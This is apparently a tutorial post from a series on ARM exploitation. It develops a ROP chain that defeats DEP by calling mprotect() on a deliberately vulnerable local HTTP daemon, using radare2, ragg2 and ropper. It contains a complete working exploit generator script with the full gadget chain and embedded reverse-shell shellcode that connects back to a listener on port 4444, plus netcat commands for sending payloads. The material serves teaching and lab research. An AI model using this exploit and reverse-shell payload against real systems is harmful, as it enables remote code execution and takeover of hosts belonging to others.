ARM Exploitation - Defeating DEP - executing mprotect()

The goal of this part is to go through the whole process of developing a ROP chain against a known vulnerable target. In this case I built a simple vulnerable HTTP server (myhttpd), which runs locally on my armbox on port 8080. The attacked daemon has a stack overflow in the URL parameter. For details on how to build myhttpd or the lab setup, see the first post of this series.

Investigating the memory map

As I already mentioned in the previous article, we need a part of the loaded binary (.text segment, dynamically loaded library) in which we search for gadgets. I used libc for my ROP chain. You can use any other part, or several of them.

Start your debugger, attach to the vulnerable process and show the memory map:

[root@armbox ~]# r2 -d $(pidof myhttpd)
= attach 757 757
bin.baddr 0x00400000
Using 0x400000
asm.bits 32
 -- Don't look at the code. Don't look.
[0xb6ef862c]> dmm
0x00400000 /usr/bin/myhttpd
0xb68c2000 /usr/lib/libgcc_s.so.1
0xb68ef000 /usr/lib/libdl-2.28.so
0xb6902000 /usr/lib/libffi.so.6.0.4
0xb691a000 /usr/lib/libgmp.so.10.3.2
0xb6988000 /usr/lib/libhogweed.so.4.4
0xb69c6000 /usr/lib/libnettle.so.6.4
0xb6a0d000 /usr/lib/libtasn1.so.6.5.5
0xb6a2d000 /usr/lib/libunistring.so.2.1.0
0xb6ba9000 /usr/lib/libp11-kit.so.0.3.0
0xb6cae000 /usr/lib/libz.so.1.2.11
0xb6cd3000 /usr/lib/libpthread-2.28.so
0xb6cfd000 /usr/lib/libgnutls.so.30.14.11
0xb6e5a000 /usr/lib/libc-2.28.so
0xb6fa5000 /usr/lib/libmicrohttpd.so.12.46.0
0xb6fce000 /usr/lib/ld-2.28.so
[0xb6ef862c]>

The larger the (r-x) segments of the used library / binary are, the better the chances of finding good gadgets. Choose wisely... :)

I have chosen:

0xb6e5a000 /usr/lib/libc-2.28.so

Investigating the crash

Let's crash the daemon! We will send a long URL to "myhttpd" and inspect the registers and the stack. Check out the following asciinema, make it fullscreen to avoid missing anything.

The daemon crashed and we see that PC got overwritten with 0x41414140. What happened? As I explained in the second part of this series, the overflow overwrote the saved LR of a non-leaf function. As soon as this function executed its epilogue to restore the saved values, the saved LR got popped into PC to return to the caller. One note on the least significant bit: the BX instruction basically copies the LSB of the address loaded into PC to the T status bit of the CPSR register, which switches the core between ARM (LSB=0) and Thumb (LSB=1) mode. The saved LR (overwritten with 0x41414141) got popped into PC, then the LSB of the popped address was written into the T bit (bit 5) of the CPSR register, and finally the LSB of PC itself was set to 0, resulting in 0x41414140.
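The effect of the LSB can be reproduced with a few lines of Python. This is only a sketch of the rule described above, not an emulator; the helper name interworking_branch is made up for this illustration.

```python
def interworking_branch(target):
    """Model a BX-style branch: return (pc, thumb) for a 32-bit target address."""
    thumb = bool(target & 1)      # the LSB is copied into the T bit of the CPSR
    pc = target & 0xFFFFFFFE      # the LSB of PC itself is cleared
    return pc, thumb


pc, thumb = interworking_branch(0x41414141)
print(hex(pc), "Thumb" if thumb else "ARM")   # 0x41414140 Thumb
```

The same rule is the reason why Thumb gadget addresses later in this post carry an odd address.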

As we can see, R11 also contains our value 0x41414141. That means the overflowed function saves LR and R11 on the stack and restores them from it. Some compilers use R11 as a frame pointer (FP), a reference for addressing local variables within a function call:

FP as reference

The variables are then accessed as FP + offset within that function.

Additionally, as we see in the asciinema, the stack contains our 'A's! Therefore we control the values of PC and R11, and we have some space on the stack. Nice.

Let's take a deeper look into the stack. The following lines show the memory of the myhttpd process after the crash:

[0x41414140]> dm
0x00400000 # 0x00401000 - usr     4K s r-x /usr/bin/myhttpd /usr/bin/myhttpd ; loc.imp._ITM_registerTMCloneTable
0x00410000 # 0x00411000 - usr     4K s r-- /usr/bin/myhttpd /usr/bin/myhttpd                    
0x00411000 # 0x00412000 - usr     4K s rw- /usr/bin/myhttpd /usr/bin/myhttpd ; obj._GLOBAL_OFFSET_TABLE
0x00412000 # 0x00433000 - usr   132K s rw- [heap] [heap]                                        
0xb5500000 # 0xb5521000 - usr   132K s rw- unk0 unk0                                            
0xb5521000 # 0xb5600000 - usr   892K s --- unk1 unk1                                                    
0xb56ff000 # 0xb5700000 - usr     4K s --- unk2 unk2                                                    
0xb5700000 # 0xb5f00000 - usr     8M s rw- unk3 unk3                                                    
0xb5f00000 # 0xb5f21000 - usr   132K s rw- unk4 unk4                                                    
0xb5f21000 # 0xb6000000 - usr   892K s --- unk5 unk5                                                
0xb60bf000 # 0xb60c0000 - usr     4K s --- unk6 unk6                                                
0xb60c0000 # 0xb68c2000 - usr     8M s rw- unk7 unk7                                                
[...]
loaded libraries
[...]
0xbefdf000 # 0xbf000000 - usr   132K s rw- [stack] [stack]
0xffff0000 # 0xffff1000 - usr     4K s r-x [vectors] [vectors]

One noticeable thing is that SP (SP = 0xb5efea50) does not point into the region which is advertised as [stack], but into an anonymous mapping that sits below the mapped libraries address-wise (and above them in the listing):

0xb5700000 # 0xb5f00000 - usr     8M s rw- unk3 unk3

It is worth understanding what is happening here. The region marked [stack] belongs to the main thread of the process. The microhttpd library starts a listener thread, which in turn starts a worker thread for each new connection, and each thread gets its own stack.

Check out the following strace to understand what is happening (pid 363 is the listener thread, 370 the worker thread):

[pid   363] mmap2(NULL, 8392704, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_STACK, -1, 0) = 0xb56ff000
[pid   363] mprotect(0xb5700000, 8388608, PROT_READ|PROT_WRITE) = 0
[pid   363] clone(child_stack=0xb5efef98, flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID, parent_tidptr=0xb5eff4c8, tls=0xb5eff920, child_tidptr=0xb5eff4c8) = 370

You can find the whole strace here.

We see that the listener thread (glibc) prepares a stack for the new thread and assigns an appropriate child_stack to it. It took me some time to get what happened... to visualize the memory map, I made a picture... enjoy:

+------------------+-------------------------------------------------------------------------------------------+
|                  |                                                                                           |
|  No R/W          |                                      ...AAAAAAA               pthread_t, TLS of thread    |
|  permissions     |    mprotect(RW)                                               <-------------------------> |
|                  |                                                                                           |
+------------------+--------------------------------------------------------------+----------------------------+
0xb56ff000      0xb5700000                                          ^             ^                   0xB5F00000
                                                                    |             |
  guard memory                      thread stack growing downwards  |             +
<-----------------> <-----------------------------------------------------------+ 0xb5efef98
                                                                    |             SP of thread at creation
                                                                SP at crash
                                                                 0xb5efea50

mmap2() allocates a chunk of memory (8392704 bytes, starting at 0xb56ff000) with no (---) permissions (see the PROT_NONE parameter of the mmap2() system call). Then mprotect() adds (rw-) permissions to a part of that region (8388608 bytes starting at 0xb5700000), but leaves out a little bit at the start. The thread's stack (child_stack parameter of clone()) points into the (rw-) region. Since the stack grows downwards, the memory without (rw-) permissions acts as a guard page. Since the stack had already grown a little bit, the SP value we observed after the crash is a little bit smaller than the initial child_stack value.
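The numbers from the strace can be checked with some quick arithmetic. The following sketch only uses the values shown above (the mmap2(), mprotect() and clone() arguments and the SP at the crash); the variable names are mine.

```python
# Values copied from the strace and the debugger session above
mmap_addr, mmap_len = 0xb56ff000, 8392704     # mmap2(..., PROT_NONE, ...)
rw_addr, rw_len = 0xb5700000, 8388608         # mprotect(..., PROT_READ|PROT_WRITE)
child_stack = 0xb5efef98                      # clone(child_stack=...)
sp_at_crash = 0xb5efea50                      # SP shown by the debugger

guard_len = rw_addr - mmap_addr               # part that stays without permissions
region_end = mmap_addr + mmap_len             # end of the whole mapping
above_stack = region_end - child_stack        # space above the initial SP (pthread_t, TLS)
stack_used = child_stack - sp_at_crash        # how far the stack had grown at the crash

print("guard region :", hex(mmap_addr), "-", hex(rw_addr), f"({guard_len} bytes)")
print("rw region    :", hex(rw_addr), "-", hex(rw_addr + rw_len))
print("above stack  :", above_stack, "bytes")
print("stack used   :", stack_used, "bytes")
```

The guard region turns out to be exactly one 4096 byte page, and the (rw-) region ends where the whole mapping ends, at 0xb5f00000.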

Well, let's summarize: We control the execution flow and also got some memory to store our ROP chain!

Finding the offsets

We already learned in the previous post that knowing the stack layout is crucial for building stack overflows. If you have many or large local variables stored on the stack, you have to shift your ROP payload many bytes towards higher memory addresses to reach the saved LR. Therefore the next step is to find the right offset (the shifter variable in my overflowgen.py script, which I will introduce soon) to place the address of our first gadget (and therefore the whole ROP chain and overflow data) exactly where the saved LR resides. Over the years plenty of tools have been developed to ease that task; one is included in the Metasploit framework (/usr/share/metasploit-framework/tools/pattern_create.rb). But since we are using radare2, like the cool kids, we can use ragg2's built-in De Bruijn pattern generator:

As you can see ragg2 does not avoid putting 1 into LSB (I do not know if metasploit does that, though). Therefore if ragg2 does not find the offset, try with +1, as I did in the video. Our offsets:

PC: 144 Bytes
SP: 148 Bytes

For reference, the command line to generate and query the De Bruijn patterns:

BRUIJN=`ragg2 -r -P 250| tr -d '\n'`; echo -e "GET $BRUIJN HTTP/1.1\n" | nc 127.0.0.1 8080

Then you can use ragg2 to query for the found offsets: ragg2 -q 0x....
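To illustrate what happens behind the scenes, here is a minimal sketch of a De Bruijn pattern generator and an offset lookup in Python. It is not ragg2's implementation and will not produce the same bytes as ragg2; the function names and the uppercase alphabet are my assumptions. The lookup tries the value both with and without the LSB set, which mirrors the "+1" trick mentioned above.

```python
import itertools
import string
import struct


def de_bruijn(alphabet, n):
    """Lazily yield the symbols of a De Bruijn sequence B(len(alphabet), n)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in a[1:p + 1]:
                    yield alphabet[j]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def make_pattern(length, n=4):
    """Return the first `length` bytes; every n-byte window in it is unique."""
    alphabet = string.ascii_uppercase.encode()
    return bytes(itertools.islice(de_bruijn(alphabet, n), length))


def find_offsets(pattern, value):
    """Return candidate offsets of a 32-bit little-endian value, with and without LSB."""
    hits = set()
    for candidate in (value, value | 1):
        pos = pattern.find(struct.pack('<I', candidate))
        if pos != -1:
            hits.add(pos)
    return sorted(hits)


pattern = make_pattern(250)
saved_lr = struct.unpack_from('<I', pattern, 144)[0]  # what would land in the saved LR
pc_seen = saved_lr & 0xFFFFFFFE                       # the debugger shows PC with LSB cleared
print(find_offsets(pattern, pc_seen))
```

Because clearing the LSB can turn the value into another window of the pattern, the lookup returns all candidates instead of a single offset.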

Exploiting the vulnerability

Depending on the length of your ROP chain, you can execute basically all commands which you would otherwise execute in a shellcode. Nonetheless, space on the stack might be restricted, and moreover it is much simpler to build, test and then execute a shellcode. Now we have a conflict: we have memory space for shellcode on the stack, but the stack is only (rw-), so we can't execute it. Well, we already met the system call mprotect() when the worker thread stack was created. Nothing stops us from using that system call again to make the stack (rwx) instead of (rw-) and then execute our shellcode from the stack. Many classic ROP chains use exactly that technique...

Defining the goal: parameters for mprotect()

The prototype of mprotect():

int mprotect(void *addr, size_t len, int prot);

addr is the address where mprotect() starts to apply the permissions. After the call, the next len bytes will have the permissions passed via the prot parameter. The parameter prot has to be a bitwise OR of the following values:

#define PROT_READ       0x1             /* Page can be read.  */
#define PROT_WRITE      0x2             /* Page can be written.  */
#define PROT_EXEC       0x4             /* Page can be executed.  */
#define PROT_NONE       0x0             /* Page can not be accessed.  */

mman-linux.h

Our target register values then are:

R0: address of the thread stack. addr must be aligned to the system's page size (most commonly 4096 bytes). R0 has to be smaller than the address where your shellcode will be loaded.
R1: the length, some value large enough to make sure the part of the stack holding our shellcode will be made executable.
R2: 0x7 (PROT_READ | PROT_WRITE | PROT_EXEC)
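As a quick sanity check, the target values for R0 and R2 can be computed like this. It is a sketch that assumes 4096 byte pages and uses the SP from the crash as an example address; page_align_down is a helper name I made up.

```python
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
PAGE_SIZE = 4096   # assumption: 4 KiB pages


def page_align_down(addr, page_size=PAGE_SIZE):
    """Round an address down to the start of its page."""
    return addr & ~(page_size - 1)


sp = 0xb5efea50                              # SP at the crash, used as an example
r0 = page_align_down(sp)                     # addr parameter of mprotect()
r2 = PROT_READ | PROT_WRITE | PROT_EXEC      # prot parameter of mprotect()
print(hex(r0), hex(r2))                      # 0xb5efe000 0x7
```

Rounding down guarantees that R0 is both page-aligned and not larger than the address it was derived from.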

The chaining instruction of our last ROP gadget will point to the address of mprotect() in libc. mprotect() will then return and next our shellcode will be executed. I guess now is a good point to talk about chaining instructions...

Chaining instructions - handling `BX LR`

When I explained the general ROP idea in the second part of this series, I already showed two gadgets with different chaining instructions: POP {..., PC} and BLX R4. Then we talked about leaf and non-leaf functions, compared their epilogues and found that BX LR is used in leaf functions to return to the caller. Naturally, this instruction also appears as the chaining instruction of gadgets. Since we can't be too picky with gadgets, we have to use what we get.

I think at this point it should be pretty clear how we chain gadgets like POP {..., PC} (if not, see the previous post). But how do we handle BX LR? One way would be to load LR with the next gadget's address each time before using a gadget which uses BX LR as chaining instruction. That would certainly be possible, but pretty costly in terms of space and not very efficient. A more elegant way is to point LR to a gadget which does something like POP {PC}, so that we can use BX LR gadgets just by placing the address of the next gadget on the stack. A simple example:

Execution flow:

LR: 0xaaaaaaaa

    +-------+ 0xaaaaaaaa : pop {pc}    <-----+ 2)
    |                                        +
 3) |         0xbbbbbbbb : mov r0, #1337, bx lr <---------+ 1)
    |
    +------>  0xcccccccc : mov r2, r1, pop {r11, pc}

Stack layout while execution:

              SP
              +  0xa...     0xc...
              | +--->   +---------->
              v
+---------------------+-------+------------------------------+
|             |   0x  | JUNK  | value|                       |
|             |   cc  | value | for  |                       |
|             |   cc  | for   | PC   |                       |
|             |   cc  | R11   |      |                       |
|             |   cc  |       |      |                       |
+-------------+-------+-------+------+-----------------------+
0x0                                                         0xF

We want to first execute the gadget at 0xbbbbbbbb, then the gadget at 0xcccccccc. LR points to the gadget at 0xaaaaaaaa. When a gadget uses BX LR as chaining instruction, BX LR will jump to 0xaaaaaaaa, which POPs the value at SP into PC and therefore continues the execution there. In our example we prepared the ROP chain in a way that 0xaaaaaaaa POPs the address 0xcccccccc into PC. Each time we use a BX LR gadget now, we can place the following gadget's address on the stack and therefore chain them in a more convenient way.
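The example can be replayed with a toy model in Python. It is a deliberately simplified sketch: gadgets are Python functions, the stack is a list of words, and the addresses are the placeholder values from the diagram. Nothing here talks to a real process.

```python
def pop(state):
    """Pop one word from the simulated stack."""
    value = state["stack"][state["sp"]]
    state["sp"] += 1
    return value


def g_pop_pc(state):               # 0xaaaaaaaa: pop {pc}
    return pop(state)


def g_mov_r0_bx_lr(state):         # 0xbbbbbbbb: mov r0, #1337; bx lr
    state["r0"] = 1337
    return state["lr"]


def g_mov_r2_pop(state):           # 0xcccccccc: mov r2, r1; pop {r11, pc}
    state["r2"] = state["r1"]
    state["r11"] = pop(state)
    return pop(state)


GADGETS = {
    0xaaaaaaaa: g_pop_pc,
    0xbbbbbbbb: g_mov_r0_bx_lr,
    0xcccccccc: g_mov_r2_pop,
}


def run(state, pc):
    """Follow the chain until PC leaves the known gadgets; return (trace, final pc)."""
    trace = []
    while pc in GADGETS:
        trace.append(pc)
        pc = GADGETS[pc](state)
    return trace, pc


state = {
    "lr": 0xaaaaaaaa,              # LR points to the pop {pc} gadget (the "slide")
    "r0": 0, "r1": 0x11111111, "r2": 0, "r11": 0,
    "sp": 0,
    "stack": [0xcccccccc,          # consumed by pop {pc}
              0x4a554e4b,          # JUNK value for R11
              0xdeadbeef],         # value for PC after the last gadget
}
trace, final_pc = run(state, 0xbbbbbbbb)
print([hex(a) for a in trace], hex(final_pc))
```

The trace shows the detour through the POP {PC} gadget between the two "real" gadgets, which is exactly the price of one extra word on the stack per BX LR gadget.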

Sometimes there are chaining instructions which use BL in any combination, like BLX R7. When we can't avoid using such a gadget, we have to restore our value in LR to point again to 0xaaaaaaaa, since a BL-type instruction overwrites LR with its return address (the address of the instruction following the branch).

For all other chaining instructions I assume the instructions show what has to be done and how the ROP chain has to be prepared to chain gadgets successfully.

Using ropper

How do we find gadgets? You can manually dissect and disassemble them using objdump... but that's a pain. Let me introduce ropper:

ropper can be easily installed in a python virtualenv. Check the GitHub for instructions.

I'll let the following asciinema explain the most important features:

The parameter /1/ specifies the quality of the found gadgets, which basically stands for the number of instructions per gadget. /1/ will find gadgets where the first instruction matches the search parameter and the second is the chaining opcode. /2/ will consequently also find gadgets which have a second instruction before the chaining one. You can use these gadgets too, as long as the extra instructions do not interfere with your ROP chain...

Ropper shows the offsets of the found instructions inside the searched binary. In the first section of this post we already had a look at where in memory the libraries reside. To use the gadgets from within libc, we add the offset ropper shows us to the base address we already found.

As you already know, ARM instructions are 32 bits long, Thumb instructions only 16 bits. We can use this fact and interpret 32-bit ARM instructions as 16-bit Thumb instructions by just splitting them in half. Ropper does that automatically if we set arch ARMTHUMB. Beware: as you can see in the asciinema above, if we set ARMTHUMB as architecture, ropper will show us two columns of offsets (red and green). The green one is the one you want to choose as offset. You will note that the LSB of the green addresses is 1, so the core will automatically switch to Thumb mode when the gadget is executed.
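Turning a ropper offset into the value that goes on the stack is a small calculation. The sketch below uses the libc base address from the memory map and two offsets that appear later in my ROP chain; the helper name gadget_address is only for illustration.

```python
import struct

LIBC_BASE = 0xb6e5a000     # base address of libc-2.28.so from the memory map


def gadget_address(offset, thumb=False, base=LIBC_BASE):
    """Add the library base to a ropper offset; set the LSB for Thumb gadgets."""
    addr = base + offset
    return addr | 1 if thumb else addr


thumb_gadget = gadget_address(0x00103250, thumb=True)   # pop {r3, r7, pc} (Thumb)
arm_gadget = gadget_address(0x0005c038)                 # pop {lr}; bx r3 (ARM)

print(hex(thumb_gadget), struct.pack('<I', thumb_gadget).hex())   # 0xb6f5d251 51d2f5b6
print(hex(arm_gadget), struct.pack('<I', arm_gadget).hex())       # 0xb6eb6038 3860ebb6
```

The packed little-endian bytes are what actually ends up in the overflow data.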

ROP ROP ROP

The next step is to build the ROP chain, which

sets up R0, R1 and R2 in a way that the stack region of our thread is remapped as (rwx) once mprotect() has been called
calls mprotect()
jumps to our shellcode on the stack

Currently I do not think that it would be very helpful to explain the whole ROP chain. If you want an explanation, contact me and I will add one. Until then, I hope the embedded comments and the following bullet points are sufficient.

My ROP chain comments notation:
- (7): new (7th) gadget
- (7 p1): parameter 1 to gadget (7)
- ergo: "(15 p1): (16) mov r0, #56" means that parameter 1 of gadget 15 is the address of gadget (16).
Preparing the mprotect() call
- How to prepare R0: load SP + 4 into R0 (11), then align the value to 4096 (page size on my system) (14) by calculating R0 & R1. R1 got initialized with 0xFFFFF001 by gadget (9 p2); since the LSB of SP will always be 0, the result is page-aligned.
- How to prepare R1: load it with 0x10101010 (15 p1)
- How to prepare R2: load 0xFFFFFFFF-0x29 into R6 (3 p4), ADD 0x31 (the 32-bit result wraps around to 0x7) (4). Then move R6 to R2 (6)
- mprotect() is then called in (15 p2)
When mprotect() returns, it will execute our prepared BX LR slide, which will execute POP {PC} and load the address of the last gadget from the stack. The last gadget (16) is then executed: BLX SP. Since SP now points to our shellcode, which is appended directly to our ROP chain, that will execute the shellcode.
The shellcode I used is from Azeria's great tutorial on ARM shellcode; in this case it is the TCP reverse shellcode, which connects back to port 4444. I changed the connect-back IP to 192.168.250.1. That means the exploited myhttpd process will connect back to a netcat listener on my host system.
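The register arithmetic behind the R0 and R2 bullet points can be replayed in Python. This is a sketch with 32-bit wraparound modelled by a mask; the SP value is only an example, since SP has a different value when the gadget actually runs. The remark about zero bytes is my assumption about why such constants are convenient; the chain itself does not depend on this explanation.

```python
import struct

MASK32 = 0xFFFFFFFF


def add32(a, b):
    """32-bit addition with wraparound, like ADD/ADDS on the ARM core."""
    return (a + b) & MASK32


def has_zero_byte(value):
    """True if the little-endian encoding of the 32-bit value contains 0x00."""
    return b'\x00' in struct.pack('<I', value)


# R2: 0xFFFFFFFF-0x29 is popped into R6, then "adds r6, #0x31" wraps around
r6 = 0xFFFFFFFF - 0x29
r2 = add32(r6, 0x31)

# R0: "add r0, sp, #4" followed by "and r0, r0, r1" with R1 = 0xFFFFF001
sp = 0xb5efea50                      # example value only
r0 = add32(sp, 4) & 0xFFFFF001

print(hex(r6), hex(r2), hex(r0))
# Assumption: constants without zero bytes are easier to get through the request
print(has_zero_byte(0x7), has_zero_byte(r6))
print(has_zero_byte(0xFFFFF000), has_zero_byte(0xFFFFF001))
```

Both detours (wrapping around instead of loading 0x7 directly, and masking with 0xFFFFF001 instead of 0xFFFFF000) produce the desired register value from constants that contain no zero byte.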

The other gadgets, which are part of my ROP chain (see below in the script) are used to set up the BX LR slide, restore it, prepare values, and so on...

The ROP chain is embedded in my overflowgen.py script (see below), which should make ROP chain development easier. Take your time to understand the script and its features, like --human and --httpencode. You can read about how I use --human in the next section.

The first few variables (shift, shellcode, fmt, base) depend on your environment. During this post we found the values for base, shift (offset). Check them and make sure you understand what they do and how we found them during this tutorial.

You can find the ROP chain I used to exploit myhttpd as overflow variable in the following script.

#!/usr/bin/env python3
import struct
import sys
import argparse
from urllib.parse import quote_from_bytes

parser = argparse.ArgumentParser()
parser.add_argument('--human', help='print overflow string human readable', action='store_true', default=False)
parser.add_argument('--httpencode', help='HTTP encode overflow data (not pre_out() and post_out() data)', action='store_true', default=False)
args = parser.parse_args()

# '<I': little-endian unsigned 32-bit integer
# adjust to your CPU arch
fmt='<I'

# base address in the process memory of the library you want to use for your ROP chain
base=0xb6e5a000

# how many bytes should we shift? memory: [shift*"A"+data()+lib(),...]
shift=144
shifter = [bytes(shift*'A','ascii'),'shifter']
shellcode = b'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0a\xa1\x4a\x70\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x21\x01\xdf\x20\x1c\x02\x21\x01\xdf\x04\xa0\x52\x40\x49\x40\xc2\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\xc0\xa8\xfa\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58'

def pre_out():
    print("GET ", end='')

def post_out():
    print(" HTTP/1.1\r\n\r\n\r\n", end='')

def data(data, cmt=''):
    return [struct.pack(fmt,data),cmt]

def lib(offset, cmt=''):
    return [struct.pack(fmt,base+offset),cmt]

def out(data):
    data = [d[0] for d in data]
    b = bytearray(b''.join(data))
    pre_out()
    sys.stdout.flush()
    # append the shellcode directly after the ROP chain
    if shellcode:
        b.extend(shellcode)
    if args.httpencode:
        print(quote_from_bytes(b), end='')
    else:
        sys.stdout.buffer.write(b)
    sys.stdout.flush()
    post_out()
    sys.stdout.flush()

def out_human(data):
    pre_out()
    sys.stdout.flush()
    b = '['
    for d in data:
        b+='0x'+d[0].hex()+' = '+d[1]+'|'
    if shellcode:
        b += shellcode.hex()
    b += ']'
    print(b,end='')
    sys.stdout.flush()
    post_out()
    sys.stdout.flush()

if args.human:
    fmt = '>I'

overflow =  [
        shifter,
        # prepare BX LR slider, chaining with r3
        lib(0x00103251), # (1): 0x00103250 (0x00103251): pop {r3, r7, pc};
        lib(0x0000220f,'r3'), # (1 p1): prepare r3 for gadget (3) 0x0000220e (0x0000220f): pop {r0, r3, r4, r6, r7, pc};
        data(0x56565656,'r7'), # (1 p2): JUNK
        lib(0x0005c038,'pc'), # = (1 p3: ) (2): 0x0005c038: pop {lr}; bx r3;
        lib(0x000db435,'lr'), # = (2 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
        # / prepare BX LR slider
        lib(0x00024cb4,'r0'), # (3 p1) (5:) and r0, r0, #1; bx lr;
        lib(0x00103251, 'r3'), # (3 p2) (7:) restore lr,
        data(0x54545454,'r4'), # (3 p3) # JUNK
        data(0xFFFFFFFF-0x29,'r6'), # (3 p4):  value for (4) gadget
        data(0x57575757,'r7'), # (3 p5)
        lib(0x00012f6f,'PC'), # (3 p6) (4:) adds r6, #0x31; bx r0;
        lib(0x0003ea84), # (5 p1 bx lr) (6:) mov r2, r6; blx r3;
        lib(0x00116b80), # (7: p1) (9:) 0x00116b80: pop {r1, pc};
        data(0x57575757), # (7 p2)
        lib(0x0005c038,'pc'), # = (7 p3: ) (8:) 0x0005c038: pop {lr}; bx r3; (2)
        lib(0x000db435,'lr'), # = (8 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};
        data(0xFFFFF001, 'r1'), #( 9 p1)
        lib(0x00103251), # (9 p2) (10:) 0x00103250 (0x00103251): pop {r3, r7, pc};

        lib(0x00103251,'r3'),  # (10 p1) (11:) 0x00103250 (0x00103251): pop {r3, r7, pc};
        data(0x56565656,'r7'), # (10 p2)
        lib(0x00107cb4, 'PC'), # (10 p3) add r0, sp, #4; blx r3;

        lib(0x00024e54, 'R3'), # (11 p1), (13:) #0x00024e54: and r0, r0, r1; bx lr;
        data(0x57575757,'r7'), # (11 p2)
        lib(0x0005c038,'pc'), # (11 p3: ) (12): 0x0005c038: pop {lr}; bx r3;
        lib(0x000db435,'lr'), # (12 p1): bx lr slide: 0x000db434 (0x000db435): pop {pc};

        lib(0x00116b80), # (13 p1) (14:) 0x00116b80: pop {r1, pc};
        data(0x10101010, 'r1'), # (14 P1)
        lib(0x000d22d0,'PC'), # (14 p2) mprotect
        lib(0x00034d1d,'PC') # blx sp

        ]

if args.human:
    out_human(overflow)
else:
    out(overflow)

Download the script here.

ROP chain development process

My process is currently as follows:

I only add one gadget at a time.
Before sending the payload to the vulnerable process I attach my debugger.
I set up the new gadget in a way that PC is going to be something known, the same for changed registers.
After I executed the payload I inspect the registers to check if the gadget was successfully executed.

To ease that task I added a --human option to my script, which basically prints out the following output:

[root@armbox ~]# python overflowgen-myhttpd.py  --human
GET
[0x41[...]1414141414141414141414141 = shifter|0xb6f5d251 = |0xb6e5c20f = r3|0x56565656 = r7|
0xb6eb6038 = pc|0xb6f35435 = lr|0xb6e7ecb4 = r0|0xb6f5d251 = r3|0x54545454 = r4|0xffffffd6 = r6|
0x57575757 = r7|0xb6e6cf6f = PC|0xb6e98a84 = |0xb6f70b80 = |0x57575757 = |0xb6eb6038 = pc|
0xb6f35435 = lr|0xfffff001 = r1|0xb6f5d251 = |0xb6f5d251 = r3|0x56565656 = r7|0xb6f61cb4 = PC|
0xb6e7ee54 = R3|0x57575757 = r7|0xb6eb6038 = pc|0xb6f35435 = lr|0xb6f70b80 =
|0x10101010 = r1|0xb6f2c2d0 = PC|0xb6e8ed1d = PC|01308fe213ff2fe102200121921ac827513701df041c0aa14a701022023701df3f27201c491a01df201c012101df201c022101df04a052404940c2710b2701df02ff115cc0a8fa012f62696e2f736858] HTTP/1.1

After adding a gadget you can human-print your payload and check if the registers match with the planned values.

General Observations

Be well aware: not all registers are equal, at least on the used libc. Moving something into R0 is easy...

(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov r$count,%" 2>/dev/null| grep ':' | wc -l; let count=count+1; done

search mov R0, any

R0: 88
R1: 14
R2: 7
R3: 8
R4: 1
R5: 1
R6: 2
R7: 1
R8: 0
R9: 0
R10: 0
R11: 0
R12: 0

... moving something out, maybe not so:

(ropper) dimi@dimi-lab ~/arm-rop % count=0; while [[ $count -le 12 ]]; do echo -n R$count": "; ropper --file libc-2.28.so --quality 1 --search "mov %, r$count" 2>/dev/null| grep ':' | wc -l; let count=count+1; done

search mov any, R0

R0: 0
R1: 3
R2: 6
R3: 8
R4: 13
R5: 32
R6: 25
R7: 10
R8: 8
R9: 7
R10: 5
R11: 3
R12: 4

That's only one example and only ARM (not ARMTHUMB), nonetheless interesting.

Another important point is: the fewer registers you pollute with your values, the better. As you saw earlier, you might need registers which are "stack bound", and especially in processes which create threads these might be rare.

Action
